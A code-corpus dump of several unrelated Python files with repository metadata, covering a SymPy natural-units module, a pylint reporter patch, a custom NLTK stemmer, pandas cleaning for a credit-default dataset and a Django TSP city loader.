| 36.168831 | 117 | 0.549013 | 300 | 2,785 | 4.97 | 0.243333 | 0.078471 | 0.032193 | 0.050302 | 0.202549 | 0.177062 | 0.109993 | 0.02951 | 0 | 0 | 0 | 0.035219 | 0.32711 | 2,785 | 76 | 118 | 36.644737 | 0.760406 | 0.006463 | 0 | 0.224138 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0.017241 | 0.034483 | 0.034483 | 0.310345 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb61d8e3e5b97341a3cbfca6e4c058994f2fde4 | 1,785 | py | Python | sympy/physics/unitsystems/systems/natural.py | shipci/sympy | 4b59927bed992b980c9b3faac01becb36feef26b | [
"BSD-3-Clause"
] | 4 | 2018-07-04T17:20:12.000Z | 2019-07-14T18:07:25.000Z | sympy/physics/unitsystems/systems/natural.py | curzel-it/KiPyCalc | 909c783d5e6967ea58ca93f875106d8a8e3ca5db | [
"MIT"
] | 7 | 2017-05-01T14:15:32.000Z | 2017-09-06T20:44:24.000Z | sympy/physics/unitsystems/systems/natural.py | curzel-it/KiPyCalc | 909c783d5e6967ea58ca93f875106d8a8e3ca5db | [
"MIT"
] | 3 | 2015-04-18T22:33:32.000Z | 2015-09-23T06:45:07.000Z | # -*- coding: utf-8 -*-
# -*- coding: utf-8 -*-
"""
Naturalunit system.
The natural system comes from "setting c = 1, hbar = 1". From the computer
point of view it means that we use velocity and action instead of length and
time. Moreover instead of mass we use energy.
"""
from __future__ import division
from sympy.physics.unitsystems.dimensions import Dimension, DimensionSystem
from sympy.physics.unitsystems.units import Unit, Constant, UnitSystem
from sympy.physics.unitsystems.prefixes import PREFIXES, prefix_unit
# base dimensions
action = Dimension(name="action", symbol="A", length=2, mass=1, time=-1)
energy = Dimension(name="energy", symbol="E", length=2, mass=1, time=-2)
velocity = Dimension(name="velocity", symbol="V", length=1, time=-1)
# derived dimensions
length = Dimension(name="length", symbol="L", length=1)
mass = Dimension(name="mass", symbol="M", mass=1)
time = Dimension(name="time", symbol="T", time=1)
acceleration = Dimension(name="acceleration", length=1, time=-2)
momentum = Dimension(name="momentum", mass=1, length=1, time=-1)
force = Dimension(name="force", symbol="F", mass=1, length=1, time=-2)
power = Dimension(name="power", length=2, mass=1, time=-3)
frequency = Dimension(name="frequency", symbol="f", time=-1)
dims = (length, mass, time, momentum, force, energy, power, frequency)
# dimension system
natural_dim = DimensionSystem(base=(action, energy, velocity), dims=dims,
name="Natural system")
# base units
hbar = Constant(action, factor=1.05457266e-34, abbrev="hbar")
eV = Unit(energy, factor=1.60219e-19, abbrev="eV")
c = Constant(velocity, factor=299792458, abbrev="c")
units = prefix_unit(eV, PREFIXES)
# unit system
natural = UnitSystem(base=(hbar, eV, c), units=units, name="Natural system")
| 37.1875 | 76 | 0.712605 | 252 | 1,785 | 5.019841 | 0.293651 | 0.113043 | 0.028459 | 0.064032 | 0.063241 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03553 | 0.132773 | 1,785 | 47 | 77 | 37.978723 | 0.781654 | 0.189356 | 0 | 0 | 0 | 0 | 0.080949 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.173913 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eb7a596233dad4bd13e3f014ef38f1b7c4660a5 | 867 | py | Python | git_pylint/reporter.py | vcoder4c/git_pylint | 9e72e725152d59c1f94663c8ca1e841615a4b6cd | [
"MIT"
] | 1 | 2020-08-29T19:23:06.000Z | 2020-08-29T19:23:06.000Z | git_pylint/reporter.py | vcoder4c/git_pylint | 9e72e725152d59c1f94663c8ca1e841615a4b6cd | [
"MIT"
] | null | null | null | git_pylint/reporter.py | vcoder4c/git_pylint | 9e72e725152d59c1f94663c8ca1e841615a4b6cd | [
"MIT"
] | null | null | null | from pylint.reporters.json import JSONReporter
def json_reporter_handle_message(self, msg):
    """Manage message of different type and in the context of path."""
    # Field order matches the original literal dict (insertion order kept).
    field_names = ('path', 'abspath', 'line', 'column', 'module', 'obj',
                   'msg', 'msg_id', 'symbol', 'C', 'category')
    self.messages.append({name: getattr(msg, name) for name in field_names})
JSONReporter.handle_message = json_reporter_handle_message
def output_lint_result(lint_result, msg_template):
    """Print a pylint-style report: a module header line followed by one
    formatted line per message.

    lint_result: list of message dicts (as built by
        json_reporter_handle_message); may be empty.
    msg_template: str.format template expanded with each message dict.

    Fix: the original unconditionally read lint_result[0] and raised
    IndexError when the message list was empty; an empty list now simply
    prints nothing.
    """
    if not lint_result:
        return
    lint_module = lint_result[0]['module']
    if lint_module:
        print("************* Module {module}".format(module=lint_module))
    else:
        print("************* ")
    for msg in lint_result:
        print(msg_template.format(**msg))
| 27.967742 | 73 | 0.600923 | 105 | 867 | 4.780952 | 0.4 | 0.047809 | 0.071713 | 0.099602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00152 | 0.241061 | 867 | 30 | 74 | 28.9 | 0.761398 | 0.069204 | 0 | 0 | 0 | 0 | 0.128589 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.041667 | 0 | 0.125 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eba32c6fbf4ca5fdda513dc3cc28ee4369367a4 | 12,492 | py | Python | partstem/__init__.py | AndreyPerelygin/partstem | dacd0537aa2ddf8ac85fd28fc337dd9f0e8235a4 | [
"Apache-2.0"
] | null | null | null | partstem/__init__.py | AndreyPerelygin/partstem | dacd0537aa2ddf8ac85fd28fc337dd9f0e8235a4 | [
"Apache-2.0"
] | null | null | null | partstem/__init__.py | AndreyPerelygin/partstem | dacd0537aa2ddf8ac85fd28fc337dd9f0e8235a4 | [
"Apache-2.0"
] | null | null | null | from nltk.stem import SnowballStemmer
from nltk.stem.api import StemmerI
import nltk
import json
class ParticleStemmer(SnowballStemmer):
def __init__(self, language="english", ignore_stopwords=False, suffix_rule_list={}):
super().__init__(language=language, ignore_stopwords=ignore_stopwords)
if language == "english":
self.stemmer._EnglishStemmer__special_words.update({
"experiment":"experiment",
"experimented":"experiment",
"experimenting":"experiment",
"experiments":"experiment",
'organization': 'organiz',
"organization's": 'organiz',
'organizational': 'organiz',
'organizationally': 'organiz',
'organizations': 'organiz',
'organize': 'organiz',
'organized': 'organiz',
'organizer': 'organiz',
'organizers': 'organiz',
'organizes': 'organiz',
'organizing': 'organiz',
'science': 'scient',
'sciences': 'scient',
'scientific': 'scient',
'scientifically': 'scient',
'scientist': 'scient',
'scientistic': 'scient',
'scientists': 'scient',
'animal': 'animal',
'animalism': 'animal',
'animalistic': 'animal',
'animalities': 'animal',
'animality': 'animal',
'animals': 'animal',
'customer': 'customer',
'ratability': 'rate',
'ratable': 'rate',
'ratably': 'rate',
'rate': 'rate',
'rateable': 'rate',
'rateably': 'rate',
'rated': 'rate',
'rater': 'rate',
'raters': 'rate',
'rates': 'rate',
'rating': 'rate',
'ratings': 'rate',
'ratio': 'rate',
'ratios': 'rate',
'ration': 'ration',
'rations': 'ration',
'rationed': 'ration',
'rationing': 'ration',
'ratification': 'ratifi',
'ratified': 'ratifi',
'ratifier': 'ratifi',
'ratifiers': 'ratifi',
'ratifies': 'ratifi',
'ratify': 'ratifi',
'ratifying': 'ratifi',
'rational': 'rational',
'rationale': 'rational',
'rationales': 'rational',
'rationalism': 'rational',
'rationalist': 'rational',
'rationalistic': 'rational',
'rationalistically': 'rational',
'rationalists': 'rational',
'rationalities': 'rational',
'rationality': 'rational',
'rationalization': 'rational',
'rationalizations': 'rational',
'rationalize': 'rational',
'rationalized': 'rational',
'rationalizer': 'rational',
'rationalizers': 'rational',
'rationalizes': 'rational',
'rationalizing': 'rational',
'rationally': 'rational',
'rationalness': 'rational',
'rationals': 'rational',
'ionization': 'ion',
'ionizer': 'ion',
'ionizers': 'ion',
'ionizations': 'ion',
'chemistry': 'chem',
'chemistries': 'chem',
'chemist': 'chem',
'chemists': 'chem',
'chemism': 'chem',
'chemisms': 'chem',
'stable': 'stabil',
'stabled': 'stabil',
'stableness': 'stabil',
'laboratorial': 'lab',
'laboratorially': 'lab',
'laboratorian': 'lab',
'laboratories': 'lab',
'laboratory': 'lab',
'preppie': 'prep',
'preppies': 'prep',
'preparation': 'prep',
'preparations': 'prep',
'preparatorily': 'prep',
'preparatory': 'prep',
'prepare': 'prep',
'prepared': 'prep',
'preparedness': 'prep',
'preparer': 'prep',
'preparers': 'prep',
'prepares': 'prep',
'preparing': 'prep',
'publication': 'publish',
'publications': 'publish',
'microfluidiсs': 'microfluid',
'microfluidiс': 'microfluid',
'transmissibility': 'transmitt',
'transmissible': 'transmitt',
'transmission': 'transmitt',
'transmissions': 'transmitt',
'transmissive': 'transmitt',
'transmitting': 'transmitt',
'transmitted': 'transmitt',
'transmit': 'transmitt',
'transmits': 'transmitt',
'compliant': 'complianc',
'compliantly': 'complianc',
'allergic': 'allergen',
'allergies': 'allergen',
'allergin': 'allergen',
'allergist': 'allergen',
'allergists': 'allergen',
'allergology': 'allergen',
'allergy': 'allergen',
'reproduction': 'reproduc',
'reproductions': 'reproduc',
'reproductive': 'reproduc',
'reproductively': 'reproduc',
'reproductiveness': 'reproduc',
'reproductivity': 'reproduc',
'filtrable': 'filter',
'filtrate': 'filter',
'filtrated': 'filter',
'filtrates': 'filter',
'filtrating': 'filter',
'filtration': 'filter',
'programmable': 'program',
'programmability': 'program',
'programme': 'program',
'programmata': 'program',
'programmatic': 'program',
'programmatically': 'program',
'programmer': 'program',
'programmers': 'program',
'programmes': 'program',
'formation': 'form',
'include': 'inclus',
'includes': 'inclus',
'including': 'inclus',
'included': 'inclus',
'dosage': 'dose',
'dosages': 'dose',
'seq':'sequenc',
'mineral':'mineral',
'minerals':'mineral',
'mineralization':'mineral',
'mineralize':'mineral',
'mineralized':'mineral',
'mineralizes':'mineral',
'mineralizing':'mineral',
'designate':'designat',
'designated':'designat',
'designates':'designat',
'designating':'designat',
'designation':'designat',
'designations':'designat',
'designative':'designat',
'designator':'designat',
'designment':'designat',
'genesys':'genesys',
'poly':'poly',
'sepsis':'sept',
'fabulist':'fabl',
'fabulists':'fabl',
'flautist':'flut',
'flautists':'flut',
'hygeist':'hygien',
'hygieist':'hygien',
'hygeists':'hygien',
'hygieists':'hygien',
'hypothesist':'hypothe',
'hypothesists':'hypothe',
'lutanist':'lute',
'lutanists':'lute',
'lutenist':'lute',
'lutenists':'lute',
'lutist':'lute',
'lutists':'lute',
'magisterial':'magist',
'magisterially':'magist',
'magisterialness':'magist',
'magistery':'magist',
'magistracies':'magist',
'magistracy':'magist',
'magistrateship':'magist',
'magistrature':'magist',
'mister':'mister',
'mr':'mister',
'misters':'mister',
'mistier':'misti',
'mistiest':'misti',
'piano':'pian',
'pianos':'pian',
'cellist':'cello',
'cellists':'cello',
'orthopaedic':'orthoped',
'orthopaedics':'orthoped',
'orthopaedist':'orthoped',
'orthopaedist':'orthoped',
'papist':'papa',
'papistries':'papa',
'papistry':'papa',
'papists':'papa',
'protista':'protist',
'rapist':'rape',
'rapists':'rape',
'scenarist':'scenario',
'scenarists':'scenario',
'tourism':'tourist',
'tourisms':'tourist',
'admin':'administr',
'administer':'administr',
'administered':'administr',
'administerial':'administr',
'administering':'administr',
'administerings':'administr',
'administers':'administr',
'administratrices':'administr',
'administratrix':'administr',
'characterless':'charact',
'charactery':'charact',
'geoscience': 'geoscient',
'geosciences': 'geoscient',
'geoscientific': 'geoscient',
'geoscientifically': 'geoscient',
'geoscientist': 'geoscient',
'geoscientistic': 'geoscient',
'geoscientists': 'geoscient',
'bioscience': 'bioscient',
'biosciences': 'bioscient',
'bioscientific': 'bioscient',
'bioscientifically': 'bioscient',
'bioscientist': 'bioscient',
'bioscientistic': 'bioscient',
'bioscientists': 'bioscient',
})
from partstem.word_list import word_list
self.word_list = word_list
self.word_list += nltk.corpus.words.words()
self.stem = self.__stem
self.suffix_rule_list = {
'ant': {"with": ['ation'], "exception": []},
'eti': {"with": ['ant', ''], "exception": []},
'or': {"with": ['ion'], "exception": []},
'um': {"with": ['a'], "exception": ["medium"]},
'a': {"with": ['um', 'ary+ '], "exception": ["media"]},
'ri': {"with": [' -ried', 'er', 'tes'], "exception": []},
'er': {"with": ['y'], "exception": []},
'al': {"with": ['us'], "exception": ["animal"]},
'us': {"with": ['al'], "exception": []},
'ifi': {"with": ['e'], "exception": ["modifi", "specifi"]},
'e': {"with": ['ification'], "exception": []},
'ion': {"with": ['e'], "exception": []},
'i': {"with": ['e', 'us', 'er', 'y+ ', 'y+ic'], "exception": ["ii"]},
'si': {"with": ['sis'], "exception": ["genesi"]},
's': {"with": ['sis'], "exception": ["genes"]},
't': {"with": ['sis'], "exception": []},
'z': {"with": ['sis'], "exception": []},
"ier": {"with": ["ying", ""], "exception": []},
"abl": {"with": ["e", "es", "ate", "ation", "ed", "en", "ies", ""], "exception": ["stabl", "capabl", "fabl", "arabl", "cabl", "constabl", "decasyllabl", "despicabl", "diabl", "disabl", "effabl", "enabl", "formidabl", "gabl", "gullabl", "impeccabl", "improbabl", "incapabl", "ineffabl", "inevitabl", "inviabl", "invariabl", "viabl", "variabl", "liabl", "probabl", "syllabl", "monosyllabl", "nonstabl", "unstabl", "uncapabl", "nonviabl", "parabl", "peccabl", "polysyllabl", "sabl", "permeabl", "semipermeabl", "tabl", "tenabl", "thermostabl", "timetabl", "unabl", "vegetabl", "vocabl", "worktabl"]},
"th": {"with": [""], "exception": []},
"atori": {"with": ["ation"], "exception": []},
"ori": {"with": ["ion"], "exception": []},
"ous": {"with": ["y", "", "e", "on", "ity"], "exception": []},
"ic": {"with": ["", "e"], "exception": ["sonic", "polic", "indic"]},
"iti": {"with": ["est+ification"], "exception": []},
"iz": {"with": ["ize", "izate"], "exception": []},
"at": {"with": ["atic", "ance"], "exception": []},
'if': {"with": ["ity+est", "e"], "exception": ["modif", "specif"]},
'ist': {"with": ['ism', 'ed', 'ical', 'y', 'ium', 'est', 'ic', 'e', 'o', 'al', 'a', ''], "exception": ["mist", "agonist", "assist", "list", "backlist", "ballist", "banist", "bannist", "barrist", "batist", "booklist", "canist", "casuist", "checklist", "christ", "cist", "fist", "closefist", "exist", "coexist", "consist", "delist", "desist", "enlist", "twist", "entwist", "feist", "filist", "foist", "gist", "grist","hagadist", "heist", "heurist", "hist", "hoist", "inconist", "insist", "intwist", "resist", "irresist", "joist", "kist", "legist", "logist", "magist", "maist", "minist", "modist", "moist", "specialist", "sophist", "statist", "waist", "pantywaist", "persist", "poltergeist", "preenlist", "preexist", "regist", "protist", "reenlist", "relist", "shirtwaist", "shist", "sinist", "subsist", "tourist", "underwaist", "unlist", "untwist", "whist", "wist", "wrist", "zeitgeist"]},
'ism': {"with": ['ist', 'ic', ''], "exception": ["tourism"]},
}
self.suffix_rule_list.update(suffix_rule_list)
self.suffix_list = sorted(list(self.suffix_rule_list.keys()), key=lambda x: -len(x))
def __stem(self, word, return_snowball=False):
    """Stem *word*: normalise British -ise spellings to -ize, run the Snowball
    stemmer, then apply the custom suffix-rule table to merge related stems.

    :param word: the word to stem.
    :param return_snowball: when True, return a tuple
        (custom_stem, snowball_stem) instead of just the custom stem.
    :return: the stemmed word (or tuple, see above). Stems shorter than 3
        characters fall back to the plain Snowball stem.
    """
    if not word.startswith("improv"):
        # Unconditionally rewrite -isate* endings to -izate*.
        remove_suffix = {"isate": "izate", "isated": "izated",
                         "isating": "izating", "isates": "izates"}
        for key in remove_suffix:
            if word.endswith(key):
                word = word[:-len(key)] + remove_suffix[key]
                break
        # Rewrite -ise* to -ize* only when the result is a known word.
        remove_suffix = {"ise": "ize", "ised": "ized",
                         "ising": "izing", "ises": "izes"}
        for key in remove_suffix:
            if word.endswith(key):
                new_word = word[:-len(key)] + remove_suffix[key]
                if new_word in self.word_list:
                    word = new_word
                break
    word = self.stemmer.stem(word)
    stem_word = word
    num = 0
    # NOTE: reaches into the Snowball stemmer's name-mangled private table of
    # special-case words; tied to the nltk EnglishStemmer implementation.
    if word not in list(self.stemmer._EnglishStemmer__special_words.keys()) + list(self.stemmer._EnglishStemmer__special_words.values()) and len(word) >= 3:
        # suffix_list is sorted longest-first, so the longest matching
        # suffix wins; only the first matching suffix is ever processed.
        while num < len(self.suffix_list):
            if stem_word.endswith(self.suffix_list[num]) and stem_word not in self.suffix_rule_list[self.suffix_list[num]]["exception"]:
                without_suffix = stem_word[:-len(self.suffix_list[num])]
                if len(without_suffix) == 0:
                    num += 1
                    continue
                for el in self.suffix_rule_list[self.suffix_list[num]]["with"]:
                    # '+' separates alternatives that must ALL validate;
                    # a '-' prefix means the candidate must NOT be a word.
                    el = el.replace("+", " ")
                    el = el.replace("-", " -") if "-" in el and " -" not in el else el
                    el = el.split(" ")
                    key = True
                    for el1 in el:
                        if not ((without_suffix + el1 in self.word_list and not el1.startswith("-")) or (without_suffix + el1.replace("-", "") not in self.word_list and el1.startswith("-"))):
                            key = False
                            break
                    if key:
                        stem_word = without_suffix
                        break
                break
            num += 1
    return (stem_word, word) if return_snowball else stem_word if len(stem_word) >= 3 else word
# Module-level singleton stemmer instance shared by importers of this module.
partstem = ParticleStemmer()
| 35.896552 | 891 | 0.580692 | 1,132 | 12,492 | 6.338339 | 0.482332 | 0.015331 | 0.013659 | 0.012544 | 0.060627 | 0.045157 | 0.029826 | 0.021742 | 0.021742 | 0.011429 | 0 | 0.001082 | 0.186039 | 12,492 | 348 | 892 | 35.896552 | 0.704563 | 0 | 0 | 0.038576 | 0 | 0 | 0.458897 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.005935 | false | 0 | 0.014837 | 0 | 0.026706 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ebd3cea58ee2b7b8500c146fbc4d43dc8ae98f8 | 6,340 | py | Python | analysis/Scripts/FunctionScript.py | data301-2021-summer2/group07-Project | 48e399c45cecbe2e596dbd214fa21b939f75e5ae | [
"MIT"
] | null | null | null | analysis/Scripts/FunctionScript.py | data301-2021-summer2/group07-Project | 48e399c45cecbe2e596dbd214fa21b939f75e5ae | [
"MIT"
] | 1 | 2021-08-06T11:01:27.000Z | 2021-08-16T05:20:02.000Z | analysis/Scripts/FunctionScript.py | data301-2021-summer2/group07-Project | 48e399c45cecbe2e596dbd214fa21b939f75e5ae | [
"MIT"
] | 2 | 2021-07-12T21:48:09.000Z | 2021-08-15T00:19:27.000Z | #!/usr/bin/env python
# coding: utf-8
# In[ ]:
def LoadnClean(path):
    """Load the credit-card default CSV at *path*, clean it, and return a
    per-client summary DataFrame.

    Returns columns: Credit Limit, Sex, Education, Marital Status, Age,
    Payment_Score (mean monthly pay status + 1), Avg_Outstanding, Avg_Paid,
    Default.
    """
    import pandas as pd

    df = pd.read_csv(path, index_col=0)
    # Drop empty/NaN rows and rebuild a clean RangeIndex.
    df1 = (df
           .replace("", float("NaN"))
           .dropna()
           .reset_index(drop=True))
    df2 = (df1
           .drop(index=df1.index[0])  # first data row is a secondary header row
           # NOTE: the original dict listed "X6" twice ("Pay/Sept07" then
           # "PayStat/Sept05"); only the last entry ever took effect, so the
           # dead duplicate is removed here.
           .rename(columns={"X1": "Credit Limit",
                            "X2": "Sex",
                            "X3": "Education",
                            "X4": "Marital Status",
                            "X5": "Age",
                            "X6": "PayStat/Sept05",
                            "X7": "PayStat/Aug05",
                            "X8": "PayStat/Jul05",
                            "X9": "PayStat/Jun05",
                            "X10": "PayStat/May05",
                            "X11": "PayStat/Apr05",
                            "X12": "Outstanding/Sept05",
                            "X13": "Outstanding/Aug05",
                            "X14": "Outstanding/Jul05",
                            "X15": "Outstanding/Jun05",
                            "X16": "Outstanding/May05",
                            "X17": "Outstanding/Apr05",
                            "X18": "Paid/Sept05",
                            "X19": "Paid/Aug05",
                            "X20": "Paid/Jul05",
                            "X21": "Paid/Jun05",
                            "X22": "Paid/May05",
                            "X23": "Paid/Apr05",
                            "Y": "Default"})
           .apply(pd.to_numeric)
           .replace({'Sex': {1: "M", 2: 'F'}})
           .replace({'Education': {1: "MSc or PHd", 2: 'BSc', 3: 'High School Diploma', 4: "Other", 5: "Delete", 6: "Delete", 0: "Delete"}})
           .replace({'Marital Status': {1: "Married", 2: 'Single', 3: 'Other', 0: "Delete"}})
           .replace({'Default': {1: "True", 0: 'False'}})
           # Remove rows whose Education / Marital Status codes were invalid.
           .loc[lambda row: ~row['Education'].str.contains('Delete')]
           .loc[lambda row: ~row['Marital Status'].str.contains('Delete')])
    df3 = (df2
           .assign(Payment_Score=(df2["PayStat/Sept05"] + df2['PayStat/Aug05'] + df2['PayStat/Jul05'] + df2['PayStat/Jun05'] + df2['PayStat/May05'] + df2['PayStat/Apr05'] + 6) / 6)
           .assign(Avg_Outstanding=(df2["Outstanding/Sept05"] + df2['Outstanding/Aug05'] + df2['Outstanding/Jul05'] + df2['Outstanding/Jun05'] + df2['Outstanding/May05'] + df2['Outstanding/Apr05']) / 6)
           .assign(Avg_Paid=(df2["Paid/Sept05"] + df2['Paid/Aug05'] + df2['Paid/Jul05'] + df2['Paid/Jun05'] + df2['Paid/May05'] + df2['Paid/Apr05']) / 6)
           .drop(["PayStat/Jun05", "PayStat/Sept05", "PayStat/Aug05", "PayStat/Jul05", "PayStat/May05", "PayStat/Apr05"], axis=1)
           .drop(["Outstanding/Sept05", "Outstanding/Aug05", "Outstanding/Apr05", "Outstanding/Jul05", "Outstanding/Jun05", "Outstanding/May05"], axis=1)
           .drop(["Paid/Sept05", "Paid/Aug05", "Paid/Apr05", "Paid/Jul05", "Paid/Jun05", "Paid/May05"], axis=1)
           .reindex(columns=["Credit Limit", "Sex", "Education", "Marital Status", "Age", "Payment_Score", "Avg_Outstanding", "Avg_Paid", "Default"]))
    return df3
def AgevsDefault(df):
    """Bar-plot the percentage of defaulters vs non-defaulters per age group.

    For each Age value, computes the normalized Default distribution (as a
    percentage) and renders it as a seaborn categorical bar chart.
    """
    # Only seaborn is actually used; the original's unused pandas/matplotlib/
    # numpy imports are dropped.
    import seaborn as sns

    x, y = 'Age', 'Default'
    (df
     .groupby(x)[y]
     .value_counts(normalize=True)
     .mul(100)
     .rename('percent')
     .reset_index()
     .pipe((sns.catplot, 'data'), x=x, y='percent', height=5, aspect=3, hue=y, kind='bar'))
def JustPayments(path):
    """Load the credit-card CSV at *path* and return a fully numeric
    payment-history DataFrame: monthly pay statuses (shifted by +1 so the
    minimum is 0), Payment_Score, Avg_Outstanding, Avg_Paid; the demographic
    columns Sex / Marital Status / Education are dropped.
    """
    import pandas as pd

    df1 = pd.read_csv(path, index_col=0)
    df2 = (df1
           .drop(index=df1.index[0])  # first data row is a secondary header row
           # NOTE: the original dict listed "X6" twice ("Pay/Sept07" then
           # "PaySep"); only the last entry ever took effect.
           .rename(columns={"X1": "Credit Limit",
                            "X2": "Sex",
                            "X3": "Education",
                            "X4": "Marital Status",
                            "X5": "Age",
                            "X6": "PaySep",
                            "X7": "PayAug",
                            "X8": "PayJul",
                            "X9": "PayJun",
                            "X10": "PayMay",
                            "X11": "PayApr",
                            "X12": "Outstanding/Sept05",
                            "X13": "Outstanding/Aug05",
                            "X14": "Outstanding/Jul05",
                            "X15": "Outstanding/Jun05",
                            "X16": "Outstanding/May05",
                            "X17": "Outstanding/Apr05",
                            "X18": "Paid/Sept05",
                            "X19": "Paid/Aug05",
                            "X20": "Paid/Jul05",
                            "X21": "Paid/Jun05",
                            "X22": "Paid/May05",
                            "X23": "Paid/Apr05",
                            "Y": "Default"})
           .apply(pd.to_numeric))
    df3 = (df2
           .assign(Payment_Score=(df2["PaySep"] + df2['PayAug'] + df2['PayJul'] + df2['PayJun'] + df2['PayMay'] + df2['PayApr'] + 6) / 6)
           .assign(Avg_Outstanding=(df2["Outstanding/Sept05"] + df2['Outstanding/Aug05'] + df2['Outstanding/Jul05'] + df2['Outstanding/Jun05'] + df2['Outstanding/May05'] + df2['Outstanding/Apr05']) / 6)
           .assign(Avg_Paid=(df2["Paid/Sept05"] + df2['Paid/Aug05'] + df2['Paid/Jul05'] + df2['Paid/Jun05'] + df2['Paid/May05'] + df2['Paid/Apr05']) / 6)
           .drop(["Sex", "Marital Status", "Education"], axis=1))
    # Shift raw pay statuses up by one (original range starts at -1).
    for col in ("PaySep", "PayAug", "PayJul", "PayJun", "PayMay", "PayApr"):
        df3[col] = df3[col] + 1
    return df3
def Defaulters(df):
    """Return only the rows of *df* whose 'Default' column equals 1."""
    return df.loc[lambda frame: frame['Default'] == 1]
| 43.129252 | 195 | 0.435016 | 600 | 6,340 | 4.566667 | 0.24 | 0.061314 | 0.014599 | 0.017518 | 0.516058 | 0.516058 | 0.508759 | 0.470803 | 0.470803 | 0.470803 | 0 | 0.090767 | 0.395268 | 6,340 | 146 | 196 | 43.424658 | 0.623892 | 0.006467 | 0 | 0.530769 | 0 | 0 | 0.278272 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030769 | false | 0 | 0.092308 | 0 | 0.146154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ec13621ede7ad08cdf4a9c2edd5a1f939fb4fac | 1,820 | py | Python | AI_Web/GA/tools/pre_load_data.py | xwy27/ArtificialIntelligenceProjects | e2b0154f07d749084e2d670260fa82f8f5ea23ed | [
"MIT"
] | 4 | 2018-12-19T14:10:56.000Z | 2021-07-12T06:05:17.000Z | AI_Web/GA/tools/pre_load_data.py | xwy27/ArtificialIntelligenceProjects | e2b0154f07d749084e2d670260fa82f8f5ea23ed | [
"MIT"
] | 1 | 2019-08-06T01:57:41.000Z | 2019-08-06T01:57:41.000Z | AI_Web/SA/tools/pre_load_data.py | xwy27/ArtificialIntelligenceProjects | e2b0154f07d749084e2d670260fa82f8f5ea23ed | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''pre load default TSP city data into database'''
from django.db.transaction import atomic
from ..models import *
import os
@atomic
def atomic_save(items):
    """Save all model instances in *items* inside one database transaction."""
    for item in items:
        item.save()
# Load default city data
def load_cities(cities_folder_path, delete=False):
    '''
    Load TSPLIB data files in cities_folder_path to database.
    If delete is True, previous data in database will be deleted.
    Only EUC_2D (two-dimensional Euclidean) instances are supported.
    '''
    if delete:
        print('\nDeleting all previous city data...')
        City.objects.all().delete()
        print('Deletion completes\n')
    print('Adding city data...\n')
    cities = []
    print('Loading %s ...' % cities_folder_path)
    for root, dirs, files in os.walk(cities_folder_path):
        for name in files:
            filePath = os.path.join(root, name)
            print('Loading %s ...' % filePath)
            flag = False  # True once we are inside NODE_COORD_SECTION
            try:
                with open(filePath, mode='rb') as f:
                    for line in f:
                        # Check the edge-weight type; reject non-2D instances.
                        if line.find(b'EDGE_WEIGHT_TYPE\n') != -1:
                            # BUG FIX: `line` is bytes, so the separator must
                            # be bytes too; `line.split(':')` raised TypeError.
                            if line.split(b':')[-1].find(b'EUC_2D') == -1:
                                raise Exception('Only two-dimension supported.')
                        # Start processing node coordinates.
                        if line.find(b'NODE_COORD_SECTION') != -1:
                            flag = True
                            continue
                        if line.find(b'EOF') != -1:
                            break
                        if flag:
                            s = str(line, encoding='utf-8')
                            temp = s.split(' ')
                            cities.append(City(
                                id=temp[0],
                                X=temp[1],
                                Y=temp[2]
                            ))
            except Exception as result:
                print('Err:%s' % result)
    print('\nSaving city data...')
    atomic_save(cities)
    print('Save complates')
def pre_load_data(currentPath):
    """Load the bundled 'Cities' TSP data, wiping any previous city rows."""
    load_cities(os.path.join(currentPath, 'Cities'), True)
| 26.764706 | 64 | 0.562088 | 233 | 1,820 | 4.309013 | 0.446352 | 0.039841 | 0.063745 | 0.032869 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008744 | 0.308791 | 1,820 | 67 | 65 | 27.164179 | 0.789348 | 0.132418 | 0 | 0 | 0 | 0 | 0.150931 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0 | 0.065217 | 0 | 0.130435 | 0.173913 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
